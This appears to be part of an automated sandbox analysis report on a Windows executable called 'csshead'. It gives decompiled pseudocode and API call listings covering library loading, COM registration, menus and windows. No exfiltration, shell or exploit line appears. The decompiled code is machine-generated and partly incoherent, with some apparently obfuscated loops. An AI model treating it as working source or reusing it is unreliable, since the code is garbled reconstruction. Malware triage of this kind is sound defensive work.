    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 64%
    			E00410AE0(CHAR* _a4, intOrPtr _a8) {
    				_Unknown_base(*)()* _t5;
    				void* _t6;
    				signed int _t12;
    				struct HINSTANCE__* _t16;
    				intOrPtr _t20;
    
    				_t16 = LoadLibraryA(_a4);
    				if(_t16 != 0) {
    					_t20 = _a8;
    					if(_t20 == 0) {
    						L00401230(0x80004005);
    					}
    					_t5 = GetProcAddress(_t16, "DllGetVersion");
    					if(_t5 != 0) {
    						_t6 =  *_t5(_t20);
    						FreeLibrary(_t16);
    						return _t6;
    					} else {
    						FreeLibrary(_t16);
    						return 0x80004001;
    					}
    				} else {
    					_t12 =  *0x433268();
    					if(_t12 > 0) {
    						return _t12 & 0x0000ffff | 0x80070000;
    					}
    					return _t12;
    				}
    			}

    0x00410aec
    0x00410af0
    0x00410af9
    0x00410aff
    0x00410b06
    0x00410b06
    0x00410b11
    0x00410b19
    0x00410b2d
    0x00410b32
    0x00410b3c
    0x00410b1b
    0x00410b21
    0x00410b2b
    0x00410b2b
    0x00410af2
    0x00403aa0
    0x00403aa8
    0x00000000
    0x00403aaf
    0x00403ab4
    0x00403ab4

    APIs
    • LoadLibraryA.KERNEL32(?), ref: 00410AE6
    • FreeLibrary.KERNEL32(00000000), ref: 00410B32
      • Part of subcall function 00401230: RaiseException.KERNEL32(-C006C020,00000001,00000000,00000000,0040807F,80004005), ref: 0040124C
    • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00410B11
    • FreeLibrary.KERNEL32(00000000), ref: 00410B21
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • GetParent.USER32(?), ref: 0041257F
    • GetVersionExA.KERNEL32(?), ref: 004125DF
    • LoadLibraryA.KERNEL32(00436280), ref: 0041261A
    • GetProcAddress.KERNEL32(00000000,00436270), ref: 00412633
    • FreeLibrary.KERNEL32(00000000), ref: 0041264E
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 96%
    			E0042580D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
    				intOrPtr _t47;
    				signed int _t52;
    				signed int _t61;
    				signed int _t62;
    				signed int _t63;
    				long _t64;
    				LONG* _t67;
    				LONG* _t73;
    				intOrPtr _t89;
    				intOrPtr _t93;
    				intOrPtr _t97;
    				void* _t98;
    				void* _t101;
    
    				_t101 = __eflags;
    				_t87 = __edx;
    				_push(0x14);
    				_push(0x43cdd8);
    				L00429EF0(__ebx, __edi, __esi);
    				 *(_t98 - 0x20) =  *(_t98 - 0x20) | 0xffffffff;
    				_t89 = L00425EEB(__ebx, __edx, _t101);
    				 *((intOrPtr*)(_t98 - 0x24)) = _t89;
    				L00425504(__ebx, __edx, _t89, __esi, _t101, __fp0);
    				_t47 = L004255A8( *((intOrPtr*)(_t98 + 8)));
    				 *((intOrPtr*)(_t98 + 8)) = _t47;
    				if(_t47 ==  *((intOrPtr*)( *(_t89 + 0x68) + 4))) {
    					_t41 = _t98 - 0x20;
    					 *_t41 =  *(_t98 - 0x20) & 0x00000000;
    					__eflags =  *_t41;
    					L26:
    					return L00429F35( *(_t98 - 0x20));
    				}
    				_t73 = E0042A0DF(0x220);
    				_t103 = _t73;
    				if(_t73 == 0) {
    					goto L26;
    				}
    				memcpy(_t73,  *(_t89 + 0x68), 0x88 << 2);
    				 *_t73 =  *_t73 & 0x00000000;
    				_t52 = L00425624(0, _t87, _t103,  *((intOrPtr*)(_t98 + 8)), _t73);
    				 *(_t98 - 0x20) = _t52;
    				if(_t52 != 0) {
    					__eflags = _t52 - 0xffffffff;
    					if(_t52 == 0xffffffff) {
    						__eflags = _t73 - 0x4418d8;
    						if(__eflags != 0) {
    							E00422804(_t73);
    						}
    						 *((intOrPtr*)(L004251B8(__eflags))) = 0x16;
    					}
    				} else {
    					_t97 =  *((intOrPtr*)(_t98 - 0x24));
    					if(InterlockedDecrement( *(_t97 + 0x68)) == 0) {
    						_t69 =  *(_t97 + 0x68);
    						if( *(_t97 + 0x68) != 0x4418d8) {
    							E00422804(_t69);
    						}
    					}
    					 *(_t97 + 0x68) = _t73;
    					_t93 =  *0x433280;
    					InterlockedIncrement(_t73);
    					if(( *(_t97 + 0x70) & 0x00000002) == 0 && ( *0x441df8 & 0x00000001) == 0) {
    						L0042C08B(_t73, _t93, 0xd);
    						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
    						 *0x442c5c = _t73[1];
    						 *0x442c60 = _t73[2];
    						 *0x442c64 = _t73[3];
    						_t61 = 0;
    						while(1) {
    							 *(_t98 - 0x1c) = _t61;
    							if(_t61 >= 5) {
    								break;
    							}
    							 *((short*)(0x442c50 + _t61 * 2)) =  *((intOrPtr*)(_t73 + 0x10 + _t61 * 2));
    							_t61 = _t61 + 1;
    						}
    						_t62 = 0;
    						__eflags = 0;
    						while(1) {
    							 *(_t98 - 0x1c) = _t62;
    							__eflags = _t62 - 0x101;
    							if(_t62 >= 0x101) {
    								break;
    							}
    							 *((char*)(_t62 + 0x441af8)) =  *((intOrPtr*)( &(_t73[7]) + _t62));
    							_t62 = _t62 + 1;
    						}
    						_t63 = 0;
    						__eflags = 0;
    						while(1) {
    							 *(_t98 - 0x1c) = _t63;
    							__eflags = _t63 - 0x100;
    							if(_t63 >= 0x100) {
    								break;
    							}
    							 *((char*)(_t63 + 0x441c00)) =  *((intOrPtr*)( &(_t73[0x47]) + _t63));
    							_t63 = _t63 + 1;
    						}
    						_t64 = InterlockedDecrement( *0x441d00);
    						__eflags = _t64;
    						if(_t64 == 0) {
    							_t67 =  *0x441d00; // 0x4418d8
    							__eflags = _t67 - 0x4418d8;
    							if(_t67 != 0x4418d8) {
    								E00422804(_t67);
    							}
    						}
    						 *0x441d00 = _t73;
    						InterlockedIncrement(_t73);
    						 *(_t98 - 4) = 0xfffffffe;
    						E0042596E();
    					}
    				}
    			}

    0x0042580d
    0x0042580d
    0x0042580d
    0x0042580f
    0x00425814
    0x00425819
    0x00425822
    0x00425824
    0x00425827
    0x00425832
    0x00425837
    0x0042583d
    0x0042599a
    0x0042599a
    0x0042599a
    0x0042599e
    0x004259a6
    0x004259a6
    0x0042584e
    0x00425850
    0x00425852
    0x00000000
    0x00000000
    0x00425862
    0x00425864
    0x0042586b
    0x00425872
    0x00425877
    0x00425979
    0x0042597c
    0x0042597e
    0x00425984
    0x00425987
    0x0042598c
    0x00425992
    0x00425992
    0x0042587d
    0x0042587d
    0x0042588b
    0x0042588d
    0x00425895
    0x00425898
    0x0042589d
    0x00425895
    0x0042589e
    0x004258a2
    0x004258a8
    0x004258ae
    0x004258c3
    0x004258c9
    0x004258d0
    0x004258d8
    0x004258e0
    0x004258e5
    0x004258e7
    0x004258e7
    0x004258ed
    0x00000000
    0x00000000
    0x004258f4
    0x004258fc
    0x004258fc
    0x004258ff
    0x004258ff
    0x00425901
    0x00425901
    0x00425904
    0x00425909
    0x00000000
    0x00000000
    0x0042590f
    0x00425915
    0x00425915
    0x00425918
    0x00425918
    0x0042591a
    0x0042591a
    0x0042591d
    0x00425922
    0x00000000
    0x00000000
    0x0042592b
    0x00425931
    0x00425931
    0x0042593a
    0x00425940
    0x00425942
    0x00425944
    0x00425949
    0x0042594e
    0x00425951
    0x00425956
    0x0042594e
    0x00425957
    0x0042595e
    0x00425960
    0x00425967
    0x00425967
    0x004258ae

    APIs
    • __getptd.LIBCMT ref: 0042581D
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
      • Part of subcall function 00425504: __getptd.LIBCMT ref: 00425510
      • Part of subcall function 00425504: __amsg_exit.LIBCMT ref: 00425530
      • Part of subcall function 00425504: InterlockedDecrement.KERNEL32(?), ref: 0042555D
      • Part of subcall function 00425504: InterlockedIncrement.KERNEL32(004418D8), ref: 00425588
      • Part of subcall function 004255A8: GetOEMCP.KERNEL32(00000000), ref: 004255D1
      • Part of subcall function 004255A8: GetACP.KERNEL32(00000000), ref: 004255F4
      • Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
      • Part of subcall function 00425624: setSBCS.LIBCMT ref: 00425651
      • Part of subcall function 00425624: IsValidCodePage.KERNEL32(-00000030), ref: 00425697
      • Part of subcall function 00425624: GetCPInfo.KERNEL32(00000000,?), ref: 004256AA
      • Part of subcall function 00425624: setSBUpLow.LIBCMT ref: 00425798
    • InterlockedDecrement.KERNEL32(?), ref: 00425883
    • InterlockedIncrement.KERNEL32(00000000), ref: 004258A8
      • Part of subcall function 0042C08B: __amsg_exit.LIBCMT ref: 0042C0AD
      • Part of subcall function 0042C08B: EnterCriticalSection.KERNEL32(?,?,?,00425E08,0000000D), ref: 0042C0B5
    • InterlockedDecrement.KERNEL32 ref: 0042593A
    • InterlockedIncrement.KERNEL32(00000000), ref: 0042595E
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • GetMenuItemCount.USER32(?), ref: 0041922F
    • GetMenuStringA.USER32(?,-00000002,00000000,00000000,00000400), ref: 00419258
    • GetMenuStringA.USER32(?,-00000002,?,00000001,00000400), ref: 004192C6
    • lstrcmp.KERNEL32(?,004363E8), ref: 004192E4
    • GetSubMenu.USER32(?,?), ref: 00419317
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetWindowRect.USER32(?,?), ref: 00411FAE
      • Part of subcall function 004112B0: SetRect.USER32(?,?,?,?,?), ref: 00411304
      • Part of subcall function 004112B0: SetRect.USER32(00000000,?,?,?,?), ref: 00411320
      • Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
    • PtInRect.USER32(?), ref: 00412035
    • GetSystemMenu.USER32(?,00000000), ref: 0041204A
    • GetMenuDefaultItem.USER32(00000000,00000000,00000000), ref: 00412055
    • SendMessageA.USER32(?,00000112,00000000,00000000), ref: 00412074
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 64%
    			E0041D5C9(intOrPtr __ebx, signed int __edi, signed short __esi, signed int __ebp, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr* _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40, char _a44, CHAR* _a48, intOrPtr _a52, struct tagRECT _a56, intOrPtr _a60, intOrPtr* _a64, intOrPtr _a68, intOrPtr _a76, char _a80, intOrPtr* _a84, intOrPtr _a92, intOrPtr _a100, struct HMENU__* _a104, signed int _a108, char _a124, char _a131, intOrPtr _a132, intOrPtr _a136, char _a139, _Unknown_base(*)()* _a144, intOrPtr _a176, char _a180, struct tagPOINT _a192, intOrPtr _a196, char _a200, char _a208, char _a220, struct tagMENUITEMINFOA _a224, int _a228, int _a232, int _a236, int _a240, int _a244, struct tagPAINTSTRUCT _a348, struct tagRECT _a356, char _a940, CHAR* _a2236, intOrPtr _a2240, intOrPtr _a2244) {
    				intOrPtr* _v4;
    				char _v16;
    				intOrPtr* _v20;
    				intOrPtr* _v28;
    				intOrPtr* _v48;
    				intOrPtr* _v52;
    				CHAR* _v60;
    				intOrPtr* _v64;
    				intOrPtr _v80;
    				intOrPtr _t143;
    				CHAR* _t150;
    				void* _t163;
    				long _t165;
    				void* _t169;
    				CHAR* _t171;
    				CHAR* _t174;
    				CHAR* _t177;
    				CHAR* _t178;
    				CHAR* _t184;
    				intOrPtr* _t185;
    				CHAR* _t187;
    				intOrPtr* _t188;
    				CHAR* _t190;
    				CHAR* _t192;
    				intOrPtr* _t193;
    				intOrPtr* _t195;
    				intOrPtr* _t197;
    				int _t200;
    				struct HWND__* _t201;
    				intOrPtr* _t210;
    				CHAR* _t211;
    				CHAR* _t212;
    				CHAR* _t213;
    				CHAR* _t217;
    				intOrPtr* _t218;
    				CHAR* _t220;
    				intOrPtr* _t221;
    				intOrPtr* _t223;
    				CHAR* _t224;
    				intOrPtr* _t225;
    				intOrPtr* _t227;
    				intOrPtr* _t230;
    				intOrPtr* _t232;
    				intOrPtr* _t235;
    				intOrPtr _t251;
    				intOrPtr _t253;
    				void* _t255;
    				struct HMENU__* _t256;
    				CHAR* _t258;
    				char _t260;
    				intOrPtr _t301;
    				CHAR* _t303;
    				signed int _t339;
    				int _t340;
    				intOrPtr* _t343;
    				signed short _t345;
    				intOrPtr _t346;
    				struct HWND__* _t348;
    				CHAR* _t349;
    				void* _t350;
    				intOrPtr* _t352;
    				CHAR* _t353;
    				signed int _t356;
    				intOrPtr* _t360;
    				void* _t361;
    				void* _t362;
    				void* _t363;
    
    				_t356 = __ebp;
    				_t345 = __esi;
    				_t339 = __edi;
    				_t253 = __ebx;
    				while(1) {
    					L4:
    					 *0x442a98 =  *0x442a98 + DragQueryFileA(0, 0xffffffff,  &_a940, 0x104);
    					_t258 =  *0x442aa0; // 0x0
    					if(_t339 /  &(_t258[0x61]) * _t356 != 0) {
    						_t301 =  *0x442aa4; // 0x0
    						asm("cdq");
    						_t339 = (_t345 & 0x0000ffff) / (_t301 + 0x44);
    					}
    					_t255 = _t255 - 1;
    					if(_t255 != 0) {
    						continue;
    					}
    					L7:
    					_t143 = _a196;
    					_t260 = _a200;
    					if(_a36 != _t143 || _a40 != _t260) {
    						_a132 = _a132 + 1;
    						_a36 = _t143;
    						_a40 = _t260;
    					}
    					if(_a180 != 0) {
    						_t28 =  &_a180;
    						 *_t28 = _a180 - _a192.x;
    						__eflags =  *_t28;
    					} else {
    						_a92 = _a92 + ( *0x442aa8 & 0x0000ffff);
    					}
    					_t346 = _a132;
    					if(_t346 != 0) {
    						_a24 = _a24 + 1;
    						_push( &_a124);
    						_push(0);
    						L00432D08();
    					}
    					if(_t346 > 1 || _a24 > 4) {
    						L21:
    						_t256 = _a104;
    						 *0x442a94 =  *0x442a94 + (0x38e38e39 * _a108 >> 0x20 >> 3 >> 0x1f) + (0x38e38e39 * _a108 >> 0x20 >> 3) - ( *0x442aa8 & 0x000000ff) -  *0x442aac + _a52 + _a192.x;
    						EnableMenuItem(_t256, 0xc, 0);
    						__eflags = _a2236;
    						if(_a2236 == 0) {
    							_a52 = 0;
    							_a136 = 0;
    							_a80 = 0;
    							_a132 = 0;
    							_a24 = 0;
    							 *0x433608(0, 2);
    							_t352 =  *0x433604;
    							_t184 =  *_t352(0x433ffc, 0, 1, 0x43a508,  &_a44);
    							_t343 =  *0x4335b8;
    							__eflags = _t184;
    							if(_t184 < 0) {
    								 *_t343();
    							}
    							_t185 = _a24;
    							_t187 =  *((intOrPtr*)( *((intOrPtr*)( *_t185))))(_t185, 0x433fdc,  &_a108);
    							__eflags = _t187;
    							if(_t187 < 0) {
    								_t235 = _a12;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t235 + 8))))(_t235);
    								 *_t343();
    							}
    							_t188 = _a12;
    							_t190 =  *((intOrPtr*)( *((intOrPtr*)( *_t188))))(_t188, 0x433fec,  &_a40);
    							__eflags = _t190;
    							if(_t190 < 0) {
    								_t230 = _a84;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t230 + 8))))(_t230);
    								_t232 = _v4;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t232 + 8))))(_t232);
    								 *_t343();
    							}
    							_t192 =  *_t352( &_a32, 0, 1, 0x43a4f8,  &_a80);
    							__eflags = _t192;
    							if(_t192 >= 0) {
    								_t210 = _v20;
    								_t211 =  *((intOrPtr*)( *((intOrPtr*)( *_t210 + 0xc))))(_t210, _a60, L"Push Source");
    								__eflags = _t211;
    								if(_t211 >= 0) {
    									_t217 =  *_t352(0x43400c, 0, 1, 0x43a4f8,  &_v60);
    									__eflags = _t217;
    									if(_t217 >= 0) {
    										_t218 = _v52;
    										_t220 =  *((intOrPtr*)( *((intOrPtr*)( *_t218 + 0xc))))(_t218, _v80, L"Enhanced Video Renderer");
    										__eflags = _t220;
    										if(_t220 >= 0) {
    											_t221 = _v64;
    											 *((intOrPtr*)( *((intOrPtr*)( *_t221 + 0x30))))(_t221, 0);
    											_t223 = _a12;
    											_t224 =  *((intOrPtr*)( *((intOrPtr*)( *_t223 + 0x1c))))(_t223);
    											__eflags = _t224;
    											if(_t224 >= 0) {
    												_t227 = _v48;
    												 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 0x24))))(_t227, 0x2710,  &_v16);
    											}
    											_t225 = _a8;
    											 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 0x24))))(_t225);
    										}
    									}
    								}
    								_t212 = _a48;
    								__eflags = _t212;
    								if(_t212 != 0) {
    									 *((intOrPtr*)( *((intOrPtr*)( *_t212 + 8))))(_t212);
    								}
    								_t213 = _v60;
    								__eflags = _t213;
    								if(_t213 != 0) {
    									 *((intOrPtr*)( *((intOrPtr*)( *_t213 + 8))))(_t213);
    								}
    							}
    							_t193 = _a64;
    							 *((intOrPtr*)( *((intOrPtr*)( *_t193 + 8))))(_t193);
    							_t195 = _a4;
    							 *((intOrPtr*)( *((intOrPtr*)( *_t195 + 8))))(_t195);
    							_t197 = _v28;
    							 *((intOrPtr*)( *((intOrPtr*)( *_t197 + 8))))(_t197);
    							 *0x4335b8();
    							_t200 =  *0x442a98; // 0x0
    							_t353 =  *0x442aa0; // 0x0
    							_t201 = GetDlgItem(0, _t200);
    							 *0x4335d0(0);
    							_t360 =  *0x4335bc;
    							 *_t360(_t353, 1, 0);
    							 *0x4335c0(_t201, _t353);
    							 *0x4335c4(GetTopWindow(0));
    							 *_t360(_t353, 0, 1);
    							__eflags =  *0x442aa0;
    							if( *0x442aa0 != 0) {
    								 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 8))))(_t353);
    							}
    							 *0x4335cc();
    						}
    						E00422840( &_a224, 0, 0x30);
    						_t340 = _a108;
    						_t362 = _t361 + 0xc;
    						_a224.cbSize = 0x30;
    						_a228 = 1;
    						_a236 = 0;
    						_t150 = SetMenuItemInfoA(_t256, _t340, 0,  &_a224);
    						__eflags = _t150;
    						if(_t150 != 0) {
    							DrawMenuBar(0);
    						} else {
    							GetLastError();
    						}
    						E00422840( &_a224, 0, 0x30);
    						_t363 = _t362 + 0xc;
    						_a224.cbSize = 0x30;
    						_a228 = 1;
    						GetMenuItemInfoA(_t256, _t340, 0,  &_a224);
    						_t348 =  *0x442aa8; // 0x0
    						BeginPaint(_t348,  &_a348);
    						EndPaint(_t348,  &_a348);
    						_a348.hdc = 1;
    						GetClientRect(_t348,  &_a356);
    						EnumDateFormatsA(_a144, 0x400, 1);
    						__eflags = _t256 -  *0x442aa4; // 0x0
    						if(__eflags < 0) {
    							 *0x442aac =  *((intOrPtr*)(_t363 + 0x3ac + _t256 * 4));
    						}
    						_t349 = _a16;
    						__eflags = _t349;
    						if(_t349 == 0) {
    							L58:
    							L00405200();
    							E00405010(4, 5);
    							 *0x4335c8();
    							__eflags = _a131;
    							if(__eflags == 0) {
    								_push(_a2244);
    								_push(_a2240);
    								_t163 = L004198E0(_t256, __eflags);
    								_t363 = _t363 + 8;
    								_t350 = _t163;
    							} else {
    								_a220 = 0x435a4c;
    								_a224.cbSize = 0;
    								_a228 = 0;
    								_a232 = 0;
    								_a236 = 0;
    								_a240 = 0;
    								_a244 = 0;
    								_t169 = L004050E0( &_a220);
    								_t133 =  &_a220; // 0x435a4c
    								_t350 = _t169;
    								L00406820(_t133);
    							}
    							L004050A0(0x442ad8);
    							_t165 =  *0x442b20; // 0x0
    							Sleep(_t165);
    						} else {
    							while(1) {
    								_t171 = lstrcmpiA(_t349, "UnregServer");
    								__eflags = _t171;
    								if(_t171 == 0) {
    									break;
    								}
    								_t174 = lstrcmpiA(_t349, "RegServer");
    								__eflags = _t174;
    								if(_t174 == 0) {
    									L0040F280(0x442ad8, 0x64, 1, 0);
    									_t350 = L00409210(0x442ad8, 1, 0);
    									L62:
    									L004093B0(0x442ad8);
    									 *0x4335b8();
    									return _t350;
    								}
    								_t177 = lstrcmpiA(_t349, "Automation");
    								__eflags = _t177;
    								if(_t177 == 0) {
    									L57:
    									_a139 = 1;
    									goto L58;
    								}
    								_t178 = lstrcmpiA(_t349, "Embedding");
    								__eflags = _t178;
    								if(_t178 == 0) {
    									goto L57;
    								}
    								_t349 = E00403D10(_t349,  &_a208);
    								_t363 = _t363 + 8;
    								__eflags = _t349;
    								if(_t349 != 0) {
    									continue;
    								}
    								goto L58;
    							}
    							L0040F280(0x442ad8, 0x64, 0, 0);
    							_t350 = L004092A0(0x442ad8, 1, 0);
    						}
    						goto L62;
    					} else {
    						_a56.left = 0;
    						_a60 = 0;
    						_a64 = 0;
    						_a68 = 0;
    						CreateRectRgnIndirect( &_a56);
    						if(_a76 > 0xa) {
    							goto L21;
    						}
    						if((0x10a22d39 * ( *0x442a94 & 0x0000ffff) >> 0x20 >> 7 >> 0x1f) + (0x10a22d39 * ( *0x442a94 & 0x0000ffff) >> 0x20 >> 7) <= 1) {
    							 *0x442a94 = _a104;
    						}
    						WaitForSingleObject(_a108, 0xbb6);
    						_t253 = _a176;
    						_t345 = 0 - ( *0x442aa8 & 0x0000ffff) * _t356 + _t339;
    						_t303 =  *0x442aa0; // 0x0
    						if(_t303 - _a100 >= _t253) {
    							_t251 =  *0x442aac; // 0x0
    							 *0x442a94 = _t251 + _a28;
    						}
    						GetCursorPos( &_a192);
    						_a76 = _a76 + 1;
    						_t255 = 5;
    						do {
    							goto L4;
    						} while (_t255 != 0);
    						goto L7;
    					}
    					L4:
    					 *0x442a98 =  *0x442a98 + DragQueryFileA(0, 0xffffffff,  &_a940, 0x104);
    					_t258 =  *0x442aa0; // 0x0
    					if(_t339 /  &(_t258[0x61]) * _t356 != 0) {
    						_t301 =  *0x442aa4; // 0x0
    						asm("cdq");
    						_t339 = (_t345 & 0x0000ffff) / (_t301 + 0x44);
    					}
    					_t255 = _t255 - 1;
    				}
    			}

    APIs
      • Part of subcall function 0040F280: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040F2F6
      • Part of subcall function 0040F280: lstrlenA.KERNEL32(?), ref: 0040F33C
      • Part of subcall function 0040F280: GetModuleHandleA.KERNEL32(00000000,?,00000003,?), ref: 0040F3DB
      • Part of subcall function 0040F280: lstrlenW.KERNEL32(?,?,?,?,?,00000003,?), ref: 0040F443
      • Part of subcall function 00405200: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040520C
      • Part of subcall function 00405200: CloseHandle.KERNEL32(00000000), ref: 0040524A
      • Part of subcall function 00405010: CoRegisterClassObject.OLE32(?,?,?,?,?), ref: 00405062
      • Part of subcall function 004198E0: EnterCriticalSection.KERNEL32 ref: 0041991C
      • Part of subcall function 004198E0: GetCurrentThreadId.KERNEL32 ref: 00419922
      • Part of subcall function 004198E0: LeaveCriticalSection.KERNEL32(-00000010,-00000010,-00000010), ref: 00419942
      • Part of subcall function 004198E0: InterlockedIncrement.KERNEL32(00442AE0), ref: 004199D7
      • Part of subcall function 004198E0: ShowWindow.USER32(?,?), ref: 004199EA
      • Part of subcall function 004050A0: CoRevokeClassObject.OLE32(?), ref: 004050C1
    • GetCursorPos.USER32(?), ref: 0041D5B8
    • DragQueryFileA.SHELL32(00000000,000000FF,?,00000104), ref: 0041D5E1
    • GetNumberOfPhysicalMonitorsFromHMONITOR.DXVA2(00000000,?), ref: 0041D67B
    • CreateRectRgnIndirect.GDI32(?), ref: 0041D6AF
    • WaitForSingleObject.KERNEL32(?,00000BB6), ref: 0041D6ED
    • EnableMenuItem.USER32(?,0000000C,00000000), ref: 0041D74B
    • CoInitializeEx.OLE32(00000000,00000002), ref: 0041D77E
    • CoCreateInstance.OLE32(00433FFC,00000000,00000001,0043A508,?), ref: 0041D79C
    • CoUninitialize.OLE32 ref: 0041D7A8
    • CoUninitialize.OLE32 ref: 0041D7D2
    • CoUninitialize.OLE32 ref: 0041D808
    • CoCreateInstance.OLE32(?,00000000,00000001,0043A4F8,00000000), ref: 0041D81F
    • CoCreateInstance.OLE32(0043400C,00000000,00000001,0043A4F8,?), ref: 0041D85C
    • CoUninitialize.OLE32 ref: 0041D90B
    • GetDlgItem.USER32(00000000,00000000), ref: 0041D91F
    • OleInitialize.OLE32(00000000), ref: 0041D929
    • CoLockObjectExternal.OLE32(00000000,00000001,00000000), ref: 0041D93A
    • RegisterDragDrop.OLE32(00000000,00000000), ref: 0041D93E
    • GetTopWindow.USER32(00000000), ref: 0041D946
    • RevokeDragDrop.OLE32(00000000), ref: 0041D94D
    • CoLockObjectExternal.OLE32(00000000,00000000,00000001), ref: 0041D958
    • OleUninitialize.OLE32 ref: 0041D96B
    • SetMenuItemInfoA.USER32 ref: 0041D9B2
    • GetLastError.KERNEL32 ref: 0041D9BC
    • DrawMenuBar.USER32(00000000), ref: 0041D9C5
    • GetMenuItemInfoA.USER32 ref: 0041D9FA
    • BeginPaint.USER32(00000000,?), ref: 0041DA0F
    • EndPaint.USER32(00000000,?), ref: 0041DA1E
    • GetClientRect.USER32 ref: 0041DA38
    • EnumDateFormatsA.KERNEL32(?,00000400,00000001), ref: 0041DA4D
    • lstrcmpiA.KERNEL32(?,UnregServer), ref: 0041DA86
    • lstrcmpiA.KERNEL32(?,RegServer), ref: 0041DA92
    • lstrcmpiA.KERNEL32(?,Automation), ref: 0041DA9E
    • lstrcmpiA.KERNEL32(?,Embedding), ref: 0041DAAA
      • Part of subcall function 00403D10: CharNextA.USER32(?), ref: 00403D3B
      • Part of subcall function 00403D10: CharNextA.USER32(?), ref: 00403D42
      • Part of subcall function 00403D10: CharNextA.USER32(?), ref: 00403D51
    • CoResumeClassObjects.OLE32 ref: 0041DB2E
    • Sleep.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0041DBB9
      • Part of subcall function 004093B0: CloseHandle.KERNEL32(?), ref: 004093BC
    • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041DBC9
      • Part of subcall function 004050E0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004050FD
      • Part of subcall function 004050E0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040511F
      • Part of subcall function 004050E0: TranslateMessage.USER32(?), ref: 0040513C
      • Part of subcall function 004050E0: DispatchMessageA.USER32(?), ref: 00405143
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • SendMessageA.USER32(?,00000005,00000000,00000000), ref: 00418796
    • InvalidateRect.USER32(?,00000000,00000001), ref: 004187A4
    • GetWindowRect.USER32(?,?), ref: 004187C9
    • SendMessageA.USER32(?,00000005,00000000,00000000), ref: 004187FE
    • GetWindowRect.USER32(?,?), ref: 00418823
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • RtlEnterCriticalSection.NTDLL(00442A20), ref: 0041F12F
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F156
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F16C
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F189
